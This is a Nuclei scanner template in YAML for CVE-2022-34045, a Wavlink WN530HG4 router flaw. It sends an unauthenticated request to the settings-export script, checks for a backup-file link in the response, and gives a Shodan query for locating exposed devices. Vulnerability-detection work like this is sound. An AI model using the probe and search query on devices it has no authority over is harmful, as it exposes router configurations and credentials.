33 lines
817 B
YAML
33 lines
817 B
YAML
|
id: CVE-2022-34045
|
||
|
|
||
|
info:
|
||
|
name: Wavlink WN530HG4 - Access Control
|
||
|
author: arafatansari
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Wavlink WN530HG4 M30HG4.V5030.191116 was discovered to contain a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh.
|
||
|
reference:
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34045
|
||
|
metadata:
|
||
|
shodan-query: http.html:"WN530HG4"
|
||
|
verified: "true"
|
||
|
tags: access,control,cve,2022
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
redirects: true
|
||
|
max-redirects: 2
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- 'url=/backupsettings.dat'
|